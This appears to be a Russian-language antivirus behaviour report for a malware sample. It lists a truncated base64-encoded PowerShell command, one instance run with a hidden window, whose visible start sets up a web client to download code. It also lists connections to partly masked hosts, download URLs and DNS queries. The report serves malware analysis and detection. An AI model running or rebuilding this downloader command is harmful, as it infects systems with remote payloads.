Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcANgBfAF8AMgA9ACgAJwBDADgANwAwADEAJwArACcANgAnACsAJwA5ACcAKQA7ACQAYQBfADMAMQA0AF8APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAbQAwADQAXwA5ADIAPQAoACcAaAB0AH...
- 'se######ren.godohosting.com':80
- 'cn##a.tw':80
- 'em##ava.eu':80
- http://se######ren.godohosting.com/postureview/5Dh6609
- http://em##ava.eu/8z6qORzu
- http://www.em##ava.eu/8z6qORzu
- DNS ASK se######ren.godohosting.com
- DNS ASK ma###ports.kz
- DNS ASK cn##a.tw
- DNS ASK de##.##uzhixiong.top
- DNS ASK em##ava.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXADcANgBfAF8AMgA9ACgAJwBDADgANwAwADEAJwArACcANgAnACsAJwA5ACcAKQA7ACQAYQBfADMAMQA0AF8APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAbQAwADQAXwA5ADIAPQAoACcAaAB0AH...' (со скрытым окном)